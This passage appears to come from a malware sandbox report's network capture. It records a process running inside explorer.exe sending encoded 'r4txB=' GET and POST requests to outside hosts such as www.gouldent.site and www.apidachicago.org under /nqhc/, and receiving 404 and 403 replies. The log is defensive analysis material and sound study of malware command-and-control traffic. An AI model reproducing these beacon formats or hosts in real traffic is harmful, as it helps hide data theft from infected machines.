6c 57 65 38 42 4c 59 33 75 66 7a 4b 61 36 46 5a 64 6b 77 51 62 59 4d 53 48 6e 31 6c 71 4b 55 6e 6d 6f 38 4d 35 68 52 71 77 4c 63 4a 36 34 64 67 53 7a 33 33 6f 77 45 77 4f 64 64 51 68 42 4c 62 49 61 50 43 56 4f 56 54 37
                                                                                                                                                                                    Data Ascii: r4txB=4aNeThNKxkEEw20XVekfhBPRZW8A0RSIisiUdFuPkB8zL8UQk0xOxnLslI(yvvbr2_fJ3drQ9OkoIzEQ3KyP4dwo7nsnQ1AySTRawIg1lUWARX122ytfT2irTM3c6HNzQctoHKhHER8XzfDoD1bh1b8Vo0Nt4CE6mpgeMQaFKp8Qvjyp~M6ipGYxQCX4zh9HMdvuW3WPHRtgNxO6kC8f48SiyYNgWLuIZATCeIAK4BmhaZvyMHJ0ec4QGzBvj7wUtyABxPZaz0yqELS7TU2VHwWqa5h7s7xkkauf24J5g-RzukJOORNH079DBYEH0zv3JUs96F1Usd2_Gna9usKqlOBMlz2qTgyWHc7JBQF_i4FcJO6qpZsFrPibWR~-eUuucwOb8ZyLCktz0Nmup2ag2f4ts6LzEAiEq5CVpasAXw91uW(M(vxgf75nSdmo1k8uIXuHZAG4k3iBodAPiHAyysXVbSNaJ2cSTMzUAUIGF0bCspQU2mIkvwhr4GvvHRjq3uoRmbSMATDqxaxVKavbn24-YR9RIvh_(jACz9rlmjRSbapTQQBNwvDyz3m5~FEMo1ea5YvPsJKNLa0PdRhzReirci7NErt0zAr-qjmudE3LCfBACRSOSswMU2YaRqZe3eB4n4ln1f3fC_rtD6LK(tuoB_0aXuDvwtUsMfHfoDxM3O2khxD5oXCv0YE2Oq1AvewKDq9gAivx21qv5ukYBee_vRHVlb7VhnevO1qhFNZxANxCHJHifY2i1umoys0qOp9S2G8rx2MykLephkxMEd~0x1wnt3A614S3drgRxdMTii6ca_5URv(APWJI0TUYfV1iIc0W~7UPxtX-qX58TYvLEQjE4bvfPQRQLv~IEUgUSz5KVbAvrs2ubrO9hWldjMNlAziSAZz0ncq3KiVNHlT8v6aeLOMVk4OqSnKe7Z5Zjq(kQqBFd9lDAIhD3SCYv_REtWOJz7(h9yJkUgCz0G6f7SAhznbE9wr5e-ANj29MPOENik2LBf2zSpUe39yxhmeE0vrGoktuW0aWIfU1MgZ9J4tP1PC7~BUjK6cRu4GhHGF4eR03ZNYawog5PAqhNgjNJ1VyXs1jOYhJ3l5T4KxSvHFHzBgajIfHGBCf1ouIHzPIzEwNcjCfVJFFwDITZ-JkWRKw~VwkGUW1xOeUS-7Dl3Gr93hDIZB-7hjbPDAhocrkWUGgZ83h3qmpmEfYD7ojqAAcwEaYhNXobdDdmtwiv3sMwyH1bcco4Ecb9rLHiSHHxmj2mrgY2N0uTQsBSdrLlWe8BLY3ufzKa6FZdkwQbYMSHn1lqKUnmo8M5hRqwLcJ64dgSz33owEwOddQhBLbIaPCVOVT7DVadkeEaLtw9rs6pWsasZ8rqCmu35Okbs3Pa63SkOA6SS5_O_WryzAkw7LD8_G2~o~UNju48aOXVgkVQLTTfowIangsu1ljWsVd8-OpOgA1l3iIn3QU9zl1CHva8kZoAB5rkpoMYqBqmiCM2zdkT7OdRwP3di6I8V~AkjwoRtIQMz2fO8oHkWZnXrKSowikA3~U~0IpKEADpcdrdo6o0Uz7Dcsmvoe0PvkCIC9ISoNRfjzIY0f30WCMjzz99LStqdYG4-wLXPLrjioO93f6r-uzaYrl4JWXhPol00L-lOD0wsniNgV8GTtwHUeaZopLQvr414ujYBNmUphoq6NIEm7Fbv8DUPLpu5NTW_Y71KkyjLYEEPiy1JhiEOR8cI9Kv8IazTcXHmOEVtIGFKrYZY6v8FvgIWVFIYL53_mChxK5QfCv6Cwt5F0WGrUif2SVdpeCbPsu4j3Dmzz82mvmZgThORs64lcvWUpb(v7fEG12r-q5xekN0AGedx(rD_vd9QPafkemONulqcRrFWgbiLFJ8g80ZMVLWsg_(hkavUASzhjtkd8C9qEfyS(uWGrKqM24PA9oVmLZu4nv9z710PbYPrkt6SpaXjQ6cfSGWBTT2nKfR7hr3laXee2vCOn9ZePUasQscYurZWxG5PszfZVgTlU19N(vf5x5k-5mVaavLu46CHAjf4iFXtFuKoF-MExV0DZ3FRbjOaon6EcXG5YQM4LxpHIuXdsLPBly7tVmlKGXaVKgftlWWOSTQYihWml95YF-0_ZUB7chJg7KTmzfkuIXPhDxTPxBmIrV2ZnFOmFkszmw5CU1LY0YYaY27MVo0zd7P9zN6Bj8~CCaPOtLPRMVSH54uIxXYCMr5W1wB-vD8eK2i1UOfxhq7C6plvi1IrYBh4y1iRJU9YprAGpTmJSIuOkNS2c05b8PqpfemvqbGVcdKLoW3MldLZc3aOE2Iv9EEtEm8oTfjkt3AuDjygINjEO6vkryLn(4qPGuROESrCyi0bLWHuLNcT7R9lxVxVCw(B7sIlNADVbCdiumUEHvtmLgqCsKKaEcfTPXIl~SUnZnBXtPCYEFT4yoFNWRFxhALytCyD2dmidLUj5A6gAR7XAJvJsVx912ECq_lXJSkluGed56TqTHqZU0zwLpyk1uVySIdgHOFTOvKNYd7EqmuyGskErbcKbIL9qeTLGBfpSA3DrYtRrYxIbwb0LcLBItQzU9sNUGvCxWHYMJq8BPf5BdKn9aIewYu33qN19NnI7PavKNHw9UNbqL5Vd5C4fhs6k43q2-qz9296gC4TvKYuC-Scgmu0K8CfhKIw2Kz9y0tnXON87sh1P7(JBOeqWhywHaHtj0LepkL07soWdhSBGfNH4RJdG211gVrJIJLAph8W6WCqCTjLHyfEhAIRshcWtt32W9H94xFwLK6L51LS0kSnKf6Mcop4oym3XClYE6SZI3A4tWfkOTZFjmG-Iyz00Ogs0V0t5EfaT1XYg1VnZ5SEUtk6CaYV3oG2tHCcuuolHxLUGjeFrSo-0oHDwrpPmc2cJOBKqWfvCIPDR4nt(66NxYnINfL1rnAAoH0aJkAxOJG_~cADF69LZvnYkTRHDoir5q0N6KRswtv7zkY0hyzqWAt6VtddxIFwmTLp7h5CCWKTS1tOF-~NMzvOPwFgSQD6~nvYAtoxAB0rd6GM1pgfVB(gNrbW9dC7hEGxIByQoaAUtCvBvOlEDRBC(bKWks~umS4yOEjnhGr8f1Du4AvDw3CgIGCManj3N5E-9lUJf-QPk4dHfnbfEFyFV2uXK34c9QmBM5opuA2WtlsyyZLGqtKxjm~Bx1DZ4FbKvUbANGoFNPMpnZBMa_rU7229IwCLvrkYrvrICzwUqUObRxCm0JUwZOLMopFDLsf-U8XG2pYxT1tdHz8f2Fnt(pNlbSV9s-QQRMVz3IDX3PvysAjGYna4aSZtltDTlsV-ygBScBjKFn9gEQnuDyhyiKXXDoxcuIXtc6j_sH6rHowZsQIFbjhGbhLT6pYMY3CuoGyF667ie1Vpa8OAkcUs4AiZz7HZYFq5xLUcFs0mleM15TpIw0mXbNAAWVMxtvOh9
                                                                                                                                                                                    Nov 21, 2022 19:22:04.492257118 CET971OUTData Raw: 51 39 62 66 6d 61 53 71 6a 63 47 65 65 7a 59 4b 50 73 51 31 5a 4c 51 7a 50 70 68 6e 41 34 79 76 78 52 65 39 39 65 6a 4b 4a 67 37 67 33 6e 41 48 68 4d 66 50 34 72 44 41 58 46 41 51 52 67 76 41 30 50 74 57 69 46 44 69 4d 31 32 46 34 6c 39 73 52 57
                                                                                                                                                                                    Data Ascii: Q9bfmaSqjcGeezYKPsQ1ZLQzPphnA4yvxRe99ejKJg7g3nAHhMfP4rDAXFAQRgvA0PtWiFDiM12F4l9sRW4I54LmGqRavtXz8beI11Dw9jUZhsrgzKaziK1EIpBrJLqCIFQvbHXOrnbYLSkQrQbwn4aIwFcDqN_~NgPVyn8bKs9PKv90LyIgKD5ItOInaBVw_tyzIfOttqOl8sR7yI5C8dzWK~F~U4oyKZE9KFk87dkOeX7R2yE
                                                                                                                                                                                    Nov 21, 2022 19:22:04.659965992 CET973OUTData Raw: 61 74 61 42 50 78 59 32 79 30 4d 78 49 45 52 44 65 41 59 52 32 78 32 52 5f 38 74 75 35 70 78 76 59 58 6b 6d 73 68 4a 66 72 52 71 68 41 31 53 4c 66 71 36 43 37 4d 41 37 64 62 64 45 42 58 5f 50 43 37 69 63 72 36 33 72 61 4c 65 63 4c 36 53 53 59 78
                                                                                                                                                                                    Data Ascii: ataBPxY2y0MxIERDeAYR2x2R_8tu5pxvYXkmshJfrRqhA1SLfq6C7MA7dbdEBX_PC7icr63raLecL6SSYxS5Hqlci95Gn~jLWxtAE(EMHq1M_HR881kl2e3BVxwR2uZUhHSndGp1AYKQ0QEGqtJokCudNh7~np-rR6kHkG_asDF~fr3dhHG5OfpOZo5sIX530H5zYOraBPL6ks0vHDofO6axH36LCdQKpUfcGNQnW~Teb9_8zX6
                                                                                                                                                                                    Nov 21, 2022 19:22:04.660300016 CET981OUTData Raw: 35 30 37 6c 46 4c 46 50 76 71 57 37 34 56 71 4e 32 78 6c 7a 41 4a 50 4a 6f 31 31 33 6a 68 51 75 6d 7a 55 68 59 46 5a 69 62 6c 71 67 52 48 73 71 6e 71 69 57 39 49 62 4c 6a 59 6c 67 39 66 33 39 4d 44 6e 38 65 6d 6b 7a 56 64 2d 72 79 34 51 58 47 37
                                                                                                                                                                                    Data Ascii: 507lFLFPvqW74VqN2xlzAJPJo113jhQumzUhYFZiblqgRHsqnqiW9IbLjYlg9f39MDn8emkzVd-ry4QXG7mlPcxWQ~KfYB030(LWerrelPOsCK7aSltel0pbpZzTbrDDhSGeJSUk3mksC~On7g7uZ9Zeu5BI1laYRhyI0C9i3r8pneK6V0a8DhBhE24ofurUd4N5IBpQroaLEAixB~YMy2RMTkEl3uidhPxKJBeedDC3jVCZJ6U
                                                                                                                                                                                    Nov 21, 2022 19:22:04.660435915 CET994OUTData Raw: 31 51 77 52 32 41 65 4c 43 4e 32 69 31 50 4c 72 69 33 78 32 31 55 79 50 74 4a 65 49 58 49 76 79 5a 34 61 36 57 76 71 74 37 65 53 7e 4c 37 4f 69 35 64 78 7a 42 31 52 59 48 39 51 43 79 70 48 7a 44 41 71 62 32 32 6e 54 6e 58 6e 34 4b 59 2d 63 4c 54
                                                                                                                                                                                    Data Ascii: 1QwR2AeLCN2i1PLri3x21UyPtJeIXIvyZ4a6Wvqt7eS~L7Oi5dxzB1RYH9QCypHzDAqb22nTnXn4KY-cLTCtFdQ9Tz0xnZd(_U8bQSLGk98RKu4KdiKbw2SEF8kRfpopM2ag2axv-9_beF1BMBLik2MPEs02Uc-FQBCgRpS0RC3fxRdsZRYMWZsX4Cwhj5X1RvrJU65OOmv2QDyJVeJxcwwHoPeUeaHGvwvOgauDhlyibWcuQ7K
                                                                                                                                                                                    Nov 21, 2022 19:22:04.660512924 CET996OUTData Raw: 4b 55 66 61 4a 68 69 6c 35 4a 46 4f 36 57 59 7e 4f 68 33 45 52 7a 39 48 73 34 52 7a 74 42 71 51 30 53 57 43 42 64 4c 55 52 58 6b 65 6e 6c 6a 72 67 71 71 74 7a 43 76 37 4c 53 57 6f 55 34 4c 51 35 73 4e 6b 62 5a 56 6d 48 69 46 37 72 4c 6d 6e 6f 74
                                                                                                                                                                                    Data Ascii: KUfaJhil5JFO6WY~Oh3ERz9Hs4RztBqQ0SWCBdLURXkenljrgqqtzCv7LSWoU4LQ5sNkbZVmHiF7rLmnotmDAaSeM8spYvaCXl3wQAHW2EOynVxNIJqCpcLlvzi702EfTGrtMtLp4NaXQjKLGTVDO5fitMW~qR0TEzsHEE5w7MY2xRYn53iVoz8ThpsfwthlKdh1We1riYbaoY8PfSzntzD0ELQoWtPOvbW5yeReDZVI2w_h75G
                                                                                                                                                                                    Nov 21, 2022 19:22:04.826630116 CET998OUTData Raw: 5f 71 6b 28 74 6f 6e 31 42 64 4c 43 78 51 6d 6e 4f 61 34 6d 2d 74 4d 66 31 6c 6a 6f 6f 46 77 68 51 6a 74 4f 4b 37 39 4a 30 51 61 36 48 4c 4c 64 42 54 6d 36 5a 6f 70 66 33 64 31 65 51 71 6b 68 57 4e 44 59 54 4f 48 54 67 49 2d 28 62 44 74 4f 34 71
                                                                                                                                                                                    Data Ascii: _qk(ton1BdLCxQmnOa4m-tMf1ljooFwhQjtOK79J0Qa6HLLdBTm6Zopf3d1eQqkhWNDYTOHTgI-(bDtO4qf1kO1DchNfVK2lyL1lVeLTALQqaRuvZ57fLxMzy0aawAlX1Twm4otE6mncRFgGKWlJ_QoumHqMbhBY6iHuSRXlvqp7XQ4lNMr3GR653uB(3uDjz1qafu144Ja4Aplx9BeTKYcA8GF(RWqchgVKKL-EIOlQXc47fsn
                                                                                                                                                                                    Nov 21, 2022 19:22:04.826812983 CET1008OUTData Raw: 52 4f 56 78 61 58 4a 32 43 4d 73 4c 6a 32 79 58 4e 41 38 6d 36 4e 47 52 4a 48 66 49 33 45 36 7a 75 52 33 47 6b 76 78 68 76 71 4d 4d 42 61 53 62 73 51 48 7a 78 35 39 59 36 4d 54 72 66 57 36 44 7a 47 4d 70 54 44 52 4d 66 73 38 7e 35 74 7a 30 6a 4b
                                                                                                                                                                                    Data Ascii: ROVxaXJ2CMsLj2yXNA8m6NGRJHfI3E6zuR3GkvxhvqMMBaSbsQHzx59Y6MTrfW6DzGMpTDRMfs8~5tz0jKa(9(6VOUvhNIUptx906HjmuEsi-lISbQzSnYrep6One0sqjv9WONNlTAksUoEWyMPO-eBjfSfk4XZaF3WWAw6rd8LVMDa8N6BPg~tCA~xFy5DiQyc96CAuDaWnq7uomfTzlaAj6RFlKIhhpDH(BioleKw9mflVfqN
                                                                                                                                                                                    Nov 21, 2022 19:22:04.826931953 CET1010OUTData Raw: 62 30 54 30 51 39 68 68 68 68 47 6d 62 45 57 63 6d 64 36 4b 32 32 68 68 79 76 36 68 37 6a 41 42 56 41 77 33 6d 65 53 32 63 36 67 4b 4c 53 41 47 76 4c 54 54 63 71 62 30 46 47 75 4c 35 48 55 53 47 41 68 73 59 35 33 45 33 74 5f 4f 48 57 33 49 6c 67
                                                                                                                                                                                    Data Ascii: b0T0Q9hhhhGmbEWcmd6K22hhyv6h7jABVAw3meS2c6gKLSAGvLTTcqb0FGuL5HUSGAhsY53E3t_OHW3Ilgs(OBL6S5F4J9kzGq0k77c64ZE9Hneh30M(nivKiHj0AhzQ8B1okbpLqob22RBztIi(qMaYUYrM7aSjr3bfQOl33020TqKQu~DHZjF(_XiDFq6qtNq4NhkP0UgTgV7gDNJqM9ztwghkrs50BwwN-jPs7WJr2q80fBf
                                                                                                                                                                                    Nov 21, 2022 19:22:05.127295017 CET1012INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:22:04 GMT
                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                    Content-Length: 570
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    34192.168.11.204985966.29.151.4080C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:22:06.681900024 CET1012OUTGET /nqhc/?r4txB=1Yl+QUBI4kgCsXI3Vp53kl3xa1s40hGy3/rGU37TkiIZHr5R+30vzUqate7I4LnPvrrd2ZP58ux1HT0e4Ni8o787tXF+UCoQAg==&1b=S8jD HTTP/1.1
                                                                                                                                                                                    Host: www.gouldent.site
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    Nov 21, 2022 19:22:06.958236933 CET1013INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:22:06 GMT
                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                    Content-Length: 570
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    35192.168.11.2049860194.245.148.18980C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:22:12.201611042 CET1014OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.apidachicago.org
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 187
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.apidachicago.org
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.apidachicago.org/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 33 39 34 78 30 70 64 78 41 5f 36 31 65 67 54 47 30 4d 45 44 41 43 43 76 73 4d 7a 66 36 6e 52 73 49 4a 6b 78 7a 38 66 47 78 4d 6f 44 71 39 63 65 6f 4f 66 64 63 67 54 77 7a 68 70 35 42 46 31 6b 43 55 6a 63 30 6c 70 44 48 4d 51 4c 79 68 39 71 39 32 53 31 4a 4d 59 62 44 72 28 67 50 6c 31 67 64 5f 56 7a 4a 34 4d 51 6d 71 69 6b 7a 33 6f 44 36 69 37 4e 6f 62 36 54 62 2d 6f 70 36 53 52 5a 6c 74 75 78 47 57 52 7a 78 6f 79 69 6c 4f 5a 6c 74 37 77 67 50 2d 64 4a 37 52 49 52 46 45 4a 6a 51 30 67 52 4c 36 4f 2d 73 49 5a 32 39 5f 6d 46 7e 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=394x0pdxA_61egTG0MEDACCvsMzf6nRsIJkxz8fGxMoDq9ceoOfdcgTwzhp5BF1kCUjc0lpDHMQLyh9q92S1JMYbDr(gPl1gd_VzJ4MQmqikz3oD6i7Nob6Tb-op6SRZltuxGWRzxoyilOZlt7wgP-dJ7RIRFEJjQ0gRL6O-sIZ29_mF~w).
                                                                                                                                                                                    Nov 21, 2022 19:22:12.220195055 CET1015INHTTP/1.1 403 Forbidden
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:22:12 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Nov 21, 2022 19:22:12.220256090 CET1015INData Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72
                                                                                                                                                                                    Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                    Nov 21, 2022 19:22:12.220271111 CET1015INData Raw: 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    36192.168.11.2049861194.245.148.18980C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:22:14.248290062 CET1016OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.apidachicago.org
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 527
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.apidachicago.org
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.apidachicago.org/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 33 39 34 78 30 70 64 78 41 5f 36 31 64 41 6a 47 34 4e 45 44 42 69 43 6f 70 4d 7a 66 31 48 52 53 49 4a 59 78 7a 34 48 57 6b 75 38 44 72 63 73 65 70 4d 33 64 52 41 54 77 38 42 70 38 4d 6c 31 56 43 55 76 2d 30 67 52 44 48 4d 55 4c 67 44 31 71 74 57 53 71 64 38 59 61 55 62 28 68 4c 6c 31 71 64 5f 49 53 4a 34 6f 51 6d 37 4f 6b 79 30 41 44 72 44 36 62 7e 4c 36 76 64 2d 6f 71 73 69 52 58 6c 74 53 54 47 55 41 4d 77 61 75 69 6c 75 35 6c 28 4c 77 6a 56 2d 64 4f 6d 68 4a 43 4f 56 49 36 66 69 55 74 4c 6f 47 38 6b 70 78 67 77 4d 37 62 38 78 50 6e 51 6f 7e 52 6d 79 74 73 6c 54 71 37 39 5f 6f 42 41 32 4b 36 66 44 56 38 48 65 6d 64 34 45 74 72 7a 4b 37 72 30 62 74 4f 7a 43 35 59 61 43 4b 52 46 30 45 4c 67 73 36 7a 45 30 64 53 70 58 6b 33 67 44 6e 6d 74 43 4c 41 4e 5f 31 6b 46 53 77 6d 42 49 4e 65 71 38 47 6b 77 62 39 45 73 75 79 61 4c 7a 49 57 61 34 68 79 58 63 61 2d 39 5f 65 57 71 33 58 71 6f 4b 4a 4b 38 75 72 73 70 6c 32 72 74 2d 50 4c 42 54 53 6d 44 4b 34 33 52 30 77 4b 37 52 38 75 4a 67 79 41 48 4f 70 56 4e 5f 6e 77 6d 6f 50 50 79 41 45 64 72 79 62 5f 28 66 37 73 61 69 6a 6a 4c 45 50 4a 7e 57 61 65 58 75 46 73 41 50 35 52 46 68 53 39 33 5f 58 37 50 72 72 49 61 53 35 50 79 5a 48 4e 38 7a 45 43 70 38 38 36 53 37 41 37 5a 6a 43 5a 61 32 59 4a 46 61 5a 36 51 36 7e 31 66 32 66 59 7a 35 64 6d 35 4d 39 45 44 65 7a 66 37 72 71 4a 6f 41 78 69 50 58 67 4e 63 61 55 76 7a 48 32 52 7a 77 58 57 63 52 6e 53 6b 62 53 7a 36 5f 56 74 57 39 7e 56 6b 7a 35 49 46 48 74 4f 70 37 55 36 4f 44 5a 66 4e 46 64 33 37 5f 6e 67 38 49 62 45 31 42 30 4a 43 62 37 48 6b 32 45 2e 00 00 00 00 00 00 00 00
